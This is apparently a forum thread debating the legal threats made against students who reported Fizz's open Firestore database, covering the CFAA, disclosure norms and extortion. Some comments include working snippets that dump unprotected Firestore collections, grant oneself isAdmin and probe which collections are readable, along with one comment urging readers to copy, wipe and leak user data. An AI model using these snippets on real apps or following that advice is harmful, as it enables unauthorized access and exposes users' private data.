I'm not a lawyer, but I am professionally interested in this weird branch of the law, and it seems like EFF's staff attorney went a bit out on a limb here:
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database access they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplated retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession from the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
A friend points out that the limb EFF was out on was sturdy indeed, since DOJ has issued a policy statement saying they're not going after good-faith security research: https://www.justice.gov/opa/pr/department-justice-announces-...
Fizz may have violated more than a state bar rule; this could very well be extortion (depending). I would tend to agree with the balance of your comments.
> this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplated retaining a forensics firm or truing things up with their insurers, who probably did not exist
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought the need for them to their attention. If you've been operating a publicly available service with a serious vulnerability, you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they had discovered the vulnerability themselves, so long as the discovery came after they put it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
I presume that the "limb" the EFF attorney went on is basically what would've been disputed in a court of law. It's easily argued that if an app is so badly configured that just _following the Firebase protocol_ can give you write access to the database, you haven't actually circumvented any security measures, because _there weren't any to circumvent_.
It reminds me of the case where AT&T had their iPad subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
Good analysis. I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
Good analysis. One important caveat is that, while this may technically have been a CFAA violation, it's almost certainly not one the Department of Justice would prosecute.
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.

[1] https://www.justice.gov/opa/pr/department-justice-announces-...
> If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
I am extremely not a lawyer, but the pattern of legal posturing I've observed is that some lawyer makes grand over-reaching statements, and the opposing lawyer responds with their own grand over-reaching statements.
"My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
I don't think you have the pattern of facts correct (unless you have access to more information than what is in the linked Stanford Daily article).
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
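For anyone who hasn't used Firestore, it's worth seeing how little "querying the database directly" takes in that misconfigured state. A minimal sketch, assuming the v9 web SDK and a hypothetical `users` collection; the config values are placeholders standing in for the ones every Firebase web app ships publicly in its frontend bundle:

```typescript
import { initializeApp } from "firebase/app";
import { getFirestore, collection, getDocs } from "firebase/firestore";

// These values identify the project but are not secrets; every Firebase
// web app embeds them in its public JS bundle. (Placeholders here.)
const app = initializeApp({
  apiKey: "AIza-placeholder",
  projectId: "example-project",
});
const db = getFirestore(app);

// With no security rules restricting reads, any client can dump a collection:
async function dumpUsers(): Promise<void> {
  const snapshot = await getDocs(collection(db, "users"));
  snapshot.forEach((d) => console.log(d.id, d.data())); // phone, email, ...
}
```

No exploit, no circumvention: it's the same call the legitimate client makes, just pointed at documents the rules never restricted.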
I think intent matters for actually securing an indictment and conviction. If, for example, they can prove that you exfiltrated their user data (this happened to Weev, who noticed an ordinal ID in a URL and enumerated all possible URLs), they could actually get the feds to bust you. But you're right: if they're big enough they could try to come after you regardless, at the risk of turning the security research community against them.
I'm not a lawyer, so I'm pretty sure what I'm about to say wouldn't hold up in a court of law, but if you claim your system is 100% secure, then someone hacks it, I think by definition you are allowed to be there and not subject to the CFAA. In a 100% secure system you can't get into anything you're not allowed to, so if you're accessing something, you, by definition, are allowed to.
We all know there is no such thing as something 100% secure, but if you're gonna go making wild claims, you should have to stand by them.
To your point in #2: this can create a murky and risky situation for the party being reviewed. Particularly if you’re small and you are trying to land your first big client that asks questions like “have you previously been compromised?” then your answer now depends on the definition of compromised.
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
I don't understand why, in both contracts and legal communication (particularly threatening communication), there is little to no onus on the writing party to get things right.
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they have no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (which tends to be a much weaker party).
Same here. Why can a company send a threatening letter ("you'll go to federal prison for 20 years for this!!") when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequences more than "oh, nevermind"?
> I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
> "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse, as they have less access to high-powered legal authors? That means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators; doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
There is obviously such a thing as going too far, but it's kind of hard to draw a clear line. In a good faith context, laws and precedents can change quickly, sometimes based on the whim of a judge, and there are many areas of law where there is no clear precedent or where guidance is fuzzy. In those cases, it's important to have severability so that entire contracts don't have to be renegotiated because one small clause didn't hold up in court.
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
It's a balance between encouraging people to stand up for their rights on one hand and discouraging filing of frivolous lawsuits on the other. The American system is "everyone pays their own legal fees", which encourages injured parties to file. The U.K. on the other hand is a "loser pays both parties' legal fees" (generally), which discourages a lot of plaintiffs from filing, even when they have been significantly harmed.
There can be consequences, but you have to be able to demonstrate you have been harmed. So, in what way have you been harmed by such a threat, and what is just compensation? How much will it cost to hire a lawyer to sue for compensation, and what are your chances of success? These are the same kinds of questions the entity sending the threatening letter asked themselves as well. If you think it is unfair because they have more resources, well that is more of a general societal problem - if you have more money you have access to better justice in all forms.
I recently got supremely frustrated by this in civil litigation. The claimant kept filing absolute fictional nonsense with no justification, and I had to run around trying to prove these things were not the case, racking up legal fees the whole time. Apparently you can just say whatever you want.
That's not the language they use. It will be more like "your actions may violate (law ref) and if convicted, penalties may be up to 20 years in prison." And how do you keep people from saying that? It's basically a statement of fact. If you have a problem with this, then your issue is with Congress for writing such a vague law.
Because contract law mostly views things through the lens of property rights. Historically those with the most property get the most rights, so they're able to get away with imposing wildly asymmetrical terms on the implicit basis that society will collapse if they're not allowed to.
These guys (at least according to the angry letter) went beyond reasonable safe harbor for security researchers. They created admin accounts and accessed data. So the claim that there's liability here is definitely not clearly false. Probably actually true.
IANAL, but the letter is borderline extortion/blackmail. Threatening to report an illegal activity unless the alleged perpetrator does something to your advantage can be extortion/blackmail AFAIK.
I feel like this article reflects an overall positive change in the way disclosure is handled today. Back in the 90s this was the sort of thing every company did. Companies would threaten lawsuits, or disclosure in the first place seemed legally dubious. Discussions in forums / BBSs would be around whether it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
Sure, you still get some of that today from an especially old-fashioned company, or in this case naive college students, but overall things have shifted quite dramatically in favor of disclosure: dedicated middlemen who protect security researchers' identities, large enterprises encouraging and celebrating disclosure, six-figure bug bounties. Even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant for the author to go through this, but it's a nice reminder that situations like this are now somewhat rare, whereas they used to be the norm (or worse).
The problem is that it is still entirely illegal to do this kind of hacking without any permission.
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBSs would be around whether it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact that in the actual courts you are guilty of a crime.
I wonder if this was the students' attempt to protect their future careers as much as anything—"keep quiet about this or else"—especially given the issues were quickly fixed. In that sense it differs from the classic 90s era retaliation. From the students' POV it was probably quite terrifying. I wouldn't discount intervention by wealthy parents either, but of course I know nothing of the situation or the people involved.
Crazy story. The Stanford daily article has copies of the lawyer letters back and forth, they are intense - and we wouldn't be able to read them if the EFF didn't step up.
The Stanford Daily article says “At the time, Fizz used Google’s Firestore database product to store data including user information and posts...Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly...phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information....Moreover, the database was entirely editable — it was possible for anyone to edit posts, karma values, moderator status, and so on."
This is unfortunately a very common issue with Firebase apps. Since the client is writing directly to the database, usually authorization is forgotten and the client is trusted to only write to their own objects.
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
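The write side of the same mistake is just as short. A sketch, again assuming the v9 web SDK, a hypothetical `users` collection, and an `isAdmin` field like the one described above; with open rules, nothing stops a client from writing fields the developers assumed only they could set:

```typescript
import { initializeApp } from "firebase/app";
import { getAuth } from "firebase/auth";
import { getFirestore, doc, updateDoc } from "firebase/firestore";

// Placeholder config; the real values sit in the app's public bundle.
const app = initializeApp({ apiKey: "AIza-placeholder", projectId: "example-project" });
const db = getFirestore(app);

// If rules don't restrict writes, the server accepts this like any other update:
async function escalate(): Promise<void> {
  const uid = getAuth(app).currentUser?.uid;
  if (!uid) return;
  await updateDoc(doc(db, "users", uid), { isAdmin: true });
}
```

The fix lives in firestore.rules, something like `allow update: if request.auth.uid == userId && !request.resource.data.diff(resource.data).affectedKeys().hasAny(['isAdmin'])`, so clients can't touch the flag at all. Better still, don't let a client-writable document be the source of truth for admin status.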
A few years ago I found that HelloTalk (a language learning pen-pal app) stored the actual GPS coordinates of users in a SQLite database that you can find in your iOS backup. The maps in-app showed only a general location (the pin disappeared at a certain zoom).
You could also bypass the filter preventing you from searching for users over 18 if you are under (or under 18 if you are over), and paid-only filters like location, gender, etc., by rewriting the requests with a mitmproxy (paid status is not checked server-side).
Speaking of, are there tools to audit/explore firebase/firestore databases i.e. see if collections/documents are readable?
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
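Not aware of a polished public tool for this, but the core of what you're describing is small. A sketch under those assumptions (placeholder config, collection names pulled from the app's JS), using the standard v9 web SDK; and, given the rest of this thread, only worth running against projects you own or have written permission to test:

```typescript
import { initializeApp } from "firebase/app";
import { getFirestore, collection, query, limit, getDocs } from "firebase/firestore";

// Config values extracted from the target app's public frontend bundle (placeholders).
const app = initializeApp({ apiKey: "AIza-placeholder", projectId: "example-project" });
const db = getFirestore(app);

// Try to read a single document from each named collection and report the result.
async function probeCollections(names: string[]): Promise<void> {
  for (const name of names) {
    try {
      const snap = await getDocs(query(collection(db, name), limit(1)));
      console.log(`${name}: readable (${snap.size} doc sampled)`);
    } catch {
      console.log(`${name}: not readable (permission denied or other error)`);
    }
  }
}

probeCollections(["users", "posts", "messages"]); // names found in the app's JS
```

Supporting the logged-in case would just mean authenticating first, e.g. `signInWithEmailAndPassword` from `firebase/auth`, before running the probes.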
Interestingly, Ashton Cofer and Teddy Solomon of Fizz tried some PR damage control when their wrongdoing came to light https://stanforddaily.com/2022/11/01/opinion-fizz-previously.... Their response was weak and it seems like they've refused to comment on the debacle since then.
Per the Stanford Daily article linked in the OP [0], they have also removed the statement addressing this incident and supposed improvements from their website.
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
Your sentiment is silly. In general, with important caveats I will not state here, you can of course voice a threat to do an action that is legal (file a lawsuit), and may not voice a threat to do an action that is illegal (physical assault).
IANL, but in some jurisdictions and circumstances I understand that threatening someone with criminal prosecution can itself constitute the crime of extortion or abuse of process.
1. threatening violence is explicitly a crime
2. at a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. threatening to do a legal act is largely legal. it's not illegal to threaten reporting to the authorities, for instance.
> And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action.
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure", knowing you are not secure and that your users have no protection against spying from you or any minimally competent hacker, is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
I don't think the demands of Fizz have much legal standing.
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.
Interesting. My school has a very similar platform, SideChat, which I doubt is much different. Makes me wonder how much they know about me, as I was permanently banned last year for questioning the validity of "gender-affirming care."
Fantastic for calling Fizz out. "Fizz did not protect their users’ data. What happened next?"
This isn't a "someone hacked them". It's that Fizz failed to do what they promised.
I'm still curious to hear if the vulnerability has been tested to see if it's been resolved.
I think in a follow-up article by the Stanford Daily they said the app creators have gotten a few million in funding and lots of professional help, including to fix security issues. Although it still looks like user data is not fully anonymized internally like they had previously claimed.
I think I might be a bit of an outlier on this, but I struggle to see the value of imposing an embargo date in a security disclosure unless it's sent to a large institution that is used to a formal process like that. In most cases, if you're trying to communicate to someone that you've found a vulnerability on the premise that you're doing it for the greater good, why begin the relationship with a deadline before you "go public?" Wouldn't that be something you do later on if it appears that they're just blowing you off and won't do anything about it?
I don't think this applies to the reporter in this case, but it does seem like there's a bit of a trend in security research lately to capitalize on the publicity of finding a vulnerability for one's own personal branding. That feels a bit disingenuous. Not that the appropriate response would be to threaten someone with legal action.
It doesn't give them any wiggle room to lead you on, it doesn't give you any wiggle room to say 'unacceptable or I blow the whistle tomorrow', it removes your judgement of the situation from the disclosure entirely. It is the safest option for people who are great at finding things worth disclosing but not so great at situation-judging.
It's not about personal branding, it's about protecting the users of the app. Either the app fixes the vulnerability so the users are no longer in danger, or the users are made aware that they are in danger.
Security researchers have a duty to users and industry first, then to the specific companies they are disclosing to. Most companies, without time pressure, do absolutely nil to fix the issues they are made aware of.
It's completely fine to discuss or request a different disclosure date when communicating with researchers. The delay is their protection against inaction.
Do you disagree that users might be entitled to know when a corporation is misusing their private, sensitive information? What is ethical does not begin and end with the corporation's best interest; the users whose private information is being mishandled are the victims here, let us not lose perspective.
> One Friday night, we decided to explore whether Fizz was really “100% secure” like they claimed. Well, dear reader, Fizz was not 100% secure. In fact, they hardly had any security protections at all.
It's practically a given that the actual security (or privacy) of a piece of software is inversely proportional to its claimed security and how loud those claims are. Also, the companies that pay the least attention to security are always the ones who later, after the breach, say "We take security very seriously..."
There should be harsher penalties for lawyers like Hopkins & Carley for threatening security researchers and engaging in unprofessional conduct like this.
Anyone can make a threat. There's a bit of smarts needed to classify a "threat" as credible or not. Only really a law enforcement officer can credibly bring charges against you. Unfortunately, we live in a society where someone with more money than you can use the courts to harass you, so even if you don't fear illegitimate felony charges, you can pretty much get sued for any reason at any time, which brings with it consequences if you don't have a lawyer to deal with it. So I understand why someone might be scared in this situation, and luckily they were able to find someone to work with them pro bono. I really wish the law had some proactive mechanism for dealing with this type of legal bullying.
In my opinion, they went too far and exposed themselves by telling the company.
In all honesty, nothing good usually comes from that. If they wanted the truth to be exposed, they would have been better off exposing it anonymously to the company and/or public if needed.
It's one thing to happen upon a vulnerability in normal use and report it. It's a different beast to gain access to servers you don't own and start touching things.
The story has greatly reduced value without knowing who the individuals behind Fizz really are. So that we can avoid doing business with them. It would be different if Fizz was a product of a megacorporation.
“Keep calm” and “be responsible” and “speak to a lawyer” are things I class as common sense. The gold nugget I was looking for was the red flashing shipwreck buoy/marker over the names.
I realize it is quick to be against Fizz, but I thought ethical hacking required prior permission.
Am I to understand you can attempt to hack any computer to gain unauthorized access without prior approval? That doesn't seem legal at all.
Whether or not there was a vulnerability, was the action taken actually legal under current law? I don't see anything indicating for or against in the article. Just posturing that "ethical hacking" is good and saying you are secure when you aren't is bad. None of that seems relevant to the actual question of what the law says.
(a) There's no such thing as "ethical hacking" (that's an Orwellian term designed to imply that testing conducted in ways unfavorable to vendors is "unethical").
(b) You don't require permission to test software running on hardware you control (absent some contract that says otherwise).
(c) But you're right, in this case, the researchers presumably did need permission to conduct this kind of testing lawfully.
Ethically, they did the good thing by challenging the "100% secure" claim. Legally, they were hacking (without permission). Very high praise to the EFF for getting them out of trouble. Go donate.
Given the aggressive response from this company, it is less likely that it will become the target of any security researchers in the future (who wants the hassle?). That by itself makes their app less secure in the long term. Also, who'd want to support founders with this "I will destroy you, even though you helped me improve my system!" mentality? I wouldn't be surprised if this startup dies off from this info.
Kudos to Cooper, Miles and Aditya for seeing this through.
Alternatively, it will attract the attention of less-noble researchers who won't bother with responsible disclosure rules — they'll just leak data or tinker with the system. But I agree that well-intentioned security researchers will be less likely to look into this platform.
A private individual or company cannot file criminal/felony charges. Those are filed by a County Prosecutor, District Attorney, State Attorney, etc after being convinced of probable cause.
They could threaten to report you to the police or such authorities, but they would have to turn over their evidence to them and to you and open all their relevant records to you via discovery.
> Get a lawyer
Yes, if they're seriously threatening legal action they already have one.
Yes, threatening to report is what was really happening here. But in their effort to scare us, they elided much of that process. From our perspective it was "watch out, you might face felony charges if you don't agree to silence".
> A private individual or company cannot file criminal/felony charges. Those are filed by a County Prosecutor, District Attorney, State Attorney, etc after being convinced of probable cause.
That's not true, depending on where you live in the US. Several states allow private citizens to file criminal charges with a magistrate. IIRC, NJ law allows actual private prosecution of criminal charges, subject to approval by a judge and prosecutor. I think that's a holdover from English common law.
Those classmates committed felony extortion with their threat, just as an aside.
That would've been a better legal threat to put on them as an offensive move, instead of using the EFF. "Sure, you can attempt to have me jailed, but your threat is clear-cut felony extortion. See you in the jail cell right there with me!"
> Stay calm. I can’t tell you how much I wanted to curse out the Fizz team over email. But no. We had to keep it professional — even as they resorted to legal scare tactics. Your goal when you get a legal threat is to stay out of trouble. To resolve the situation. That’s it. The temporary satisfaction of saying “fuck you” isn’t worth giving up the possibility of an amicable resolution.
Maybe it's because I'm getting old, but it would never cross my mind to take any of this personally.
If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats, it's pretty clear they have no idea what they're doing.
Being the "good guy" can sometimes be harder than being the "bad guy", but suppressing your emotions is a basic requirement for being either "guy".
Yup, that's it :) These kids are either in college or just graduated. They were smart enough to get themselves legal help before saying anything stupid, which is impressive. Cut them some slack!
> If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats, it's pretty clear they have no idea what they're doing.
And yet, according to the linked article in the Stanford Daily, they received $4.5 million in funding.
Do you think that someone less ethically minded could have resolved the issue more simply, by redirecting the landing page to a warning that the site was insecure and shutting it down, incurring near-zero personal risk of retaliation and letting people make an informed choice about continuing to use the site?
That is wholly and obviously illegal, but so is the described ethical hacking. You have adopted a complex, nuanced strategy to minimize harm to all parties. This is great morally, but as far as I can tell it's only meaningful legally insofar as it makes folks less likely to go after you; nothing about it makes your obviously illegal actions legal. So if you are going to openly flout the law, it makes sense to put less of a target on your back while you are breaking it.
Best advice I can give someone is never do security research on a company without express written consent to do so, and document everything as agreed to.
Payouts for finding bugs when there isn't an already established process are either not going to be worth your time or will be seen as malicious activity.
Unless you're looking to earn a bounty, always disclose testing of this type anonymously. Clean device, clean wi-fi, new accounts. That way, if they threaten you instead of thanking you, you can just drop the exploit details publicly and wash your hands of it.
This sounds a lot less interesting than the title makes it out to be. Is the fact that it is a "classmate" really relevant? Would the events have happened differently if it was another company with no connection to the school?
In short, if they are a company, are not 100% secure, and say they are, then they are committing fraud. The person doing the testing is providing the evidence for a legal case, and no amount of legal threats changes that.
The article asserts "there are an increasing number of resources available to good-faith security researchers who face legal threats". Is there an example of such, outside of the EFF? How do beginners find them?
Makes me so happy to know the EFF and ethical hackers like this exist. I know they can't test every app and every situation, but that there are hobbyists like this is such a testament to humanity.
This isn't the first time a security researcher who politely and confidentially disclosed a vulnerability has been threatened. There's an important lesson to glean from this.
The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and protect their anonymity while doing all 3 of these.
If these researchers had done (2) and (3), and done so anonymously, that would have not only protected them from legal threats/harm but also effectively killed off a company that shouldn't exist, since all of Buzz/Fizz's users would likely abandon it as a consequence.
> The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and [4] protect their anonymity while doing all 3 of these.
Aaron Swartz only did (1). Failing at (4) didn't end so well for him.
I get that you're frustrated but encouraging others to make martyrs of themselves is cowardice. If some dumb kid tries this and their opsec isn't bulletproof, they're fucked. Put your own skin in the game and do it yourself if your convictions are that strong.
So your solution for possibly being prosecuted for something marginal is to do several things for which it would be much more reasonable to be prosecuted? That seems like a rather unwise solution to the problem.
It's especially unwise because you now give the company a massive incentive to hire real forensics specialists to try to track you down. You're placing a lot of faith in your ability to remain anonymous under that level of scrutiny.
I'd suggest reading tptacek's comment: https://news.ycombinator.com/item?id=37298589 which does not 100% address your exact question, but gets close. As disclaimed, tptacek is not a lawyer, but has a lot of experience in this space and I'd still take it as a first pass answer.
Personally, I don't see it as worth it to pursue a company that does not hang out some sort of public permission to poke at them. The upside is minimal and the downside significant. Note this is a descriptive statement, not a normative statement. In a perfect world... well, in a perfect world there'd be no security vulnerabilities to find, but... in a perfect world sure you'd never get in trouble for poking through and immediately backing off, but in the real world this story just happens too often. Takes all the fun right out of it. YMMV.
> And then, one day, they sent us a threat. A crazy threat. I remember it vividly. I was just finishing a run when the email came in. And my heart rate went up after I stopped running. That’s not what’s supposed to happen. They said that we had violated state and federal law. They threatened us with civil and criminal charges. 20 years in prison. They really just threw everything they could at us. And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action. We had five days to respond.
This during a time when thousands or millions have their personal data leaked every other week, over and over, because companies don't want to cut into their profits.
Researchers who do the right thing face legal threats of 20 years in prison. Companies who cut corners on security face no consequences. This seems backwards.
Remember when a journalist pressed F12 and saw that a Missouri state website was exposing all the personal data of every teacher in the state (including SSN, etc). He reported the security flaw responsibly and it was embarrassing to the State so the Governor attacked him and legally harassed him. https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
I once saw something similar. A government website exposing the personal data of licensed medical professionals. A REST API responded with all their personal data (including SSN, address, etc), but the HTML frontend wouldn't display it. All the data was just an unauthenticated REST call away, for thousands of people in the state. What did I do? I just closed the tab and never touched the site again. It wasn't worth the personal risk to try to do the right thing, so I just ignored it, and for all I know all those people had their data stolen multiple times over because of this security flaw. I found the flaw as part of my job at the time; I don't remember the details anymore. It has probably been fixed by now. Our legal system made it a huge personal risk to do the right thing, so I didn't do the right thing.
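For anyone who hasn't seen this failure mode, the shape is: the page renders a safe subset, but the API behind it returns the whole record. A purely hypothetical illustration (made-up endpoint and field names, not the actual site):

```typescript
// Hypothetical endpoint mirroring the flaw described above.
async function inspectLicensee(id: string): Promise<void> {
  const res = await fetch(`https://example.gov/api/licensees/${id}`);
  const record = await res.json();
  // The frontend might render only record.name and record.licenseStatus,
  // but the unauthenticated response also carries record.ssn, record.homeAddress, ...
  console.log(Object.keys(record));
}
```

Hiding fields client-side is not access control; if the API serves it, it's public.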
Which brings me to my point. We need strong protections for those who expose security flaws in good faith. Even if someone is a grey hat and has done questionable things as part of their "research", as long as they report their security findings responsibly, they should be protected.
Why have we prioritized making things nice and convenient for the companies over all else? If every American's data gets stolen in a massive breach, it's so sad, but there's nothing we can do (shrug). If one curious user or security research pokes an app and finds a flaw, and they weren't authorized to do so, OMG!, that person needs to go to jail for decades, how dare they press F12!!!1
This is a national security issue. While we continue to see the same stories of massive breaches in the news over and over and over, and some of us get yet another free year of monitoring so that credit agencies don't commit libel against us, just remember that we put the convenience of companies above all else. They get to opt in to having their security tested, and over and over they fail us.
Protect security researchers, and make it legal to test the security of an app even if the owning company does not consent. </rant>
We need personal data protection laws in this country so that as an individual after a data breach at wherever I can personally sue them for damages. Potentially very significant damages if they leak a full dossier like a credit reporting agency.
If that happens the whole calculus of bug bounties changes immediately.
I understand there has been some progress on this front, but it's not nearly enough. We need stronger protections for whistleblowers and security researchers. Corporations and legislators won't write these laws for us because it's not particularly in their interest. Well, maybe Senator Wyden and a few other highly ethical and tech-savvy legislators will help, but the onus is on us as concerned citizens and perennial victims.
Perhaps before killing someone with a comment, you should provide examples to back up your vitriol? The guidelines were reposted a mere four days ago...
Yet another example of someone security "testing" someone else's servers/systems without permission. That's called hacking. Doesn't matter if you have "good faith" or not. It's not your property and you don't get to access it in ways the owners don't desire you to access it without being subject to potential civil and criminal enforcement against you.
Meanwhile companies leak the private data of millions of people and nothing happens.
If a curious kid does a port scan, police will smash down doors. People will face decades in prison.
If a negligent company leaks the private data of every single American, well, gee, what could we have done more, we had that one company do an audit and they didn't find anything and, gee, we're just really sorry, so lets all move on and here's a free year of credit monitoring which you may choose to continue paying us for at the end of the free year.
Look at it from a consumer rights angle. A product is advertised as having some feature ("100% security" in this case), but nobody is allowed to test (even without causing any harm) if that is true.
It's effectively legalizing fraud for a big chunk of computer security. Sure fraud itself is technically still illegal, but so is exposing it.
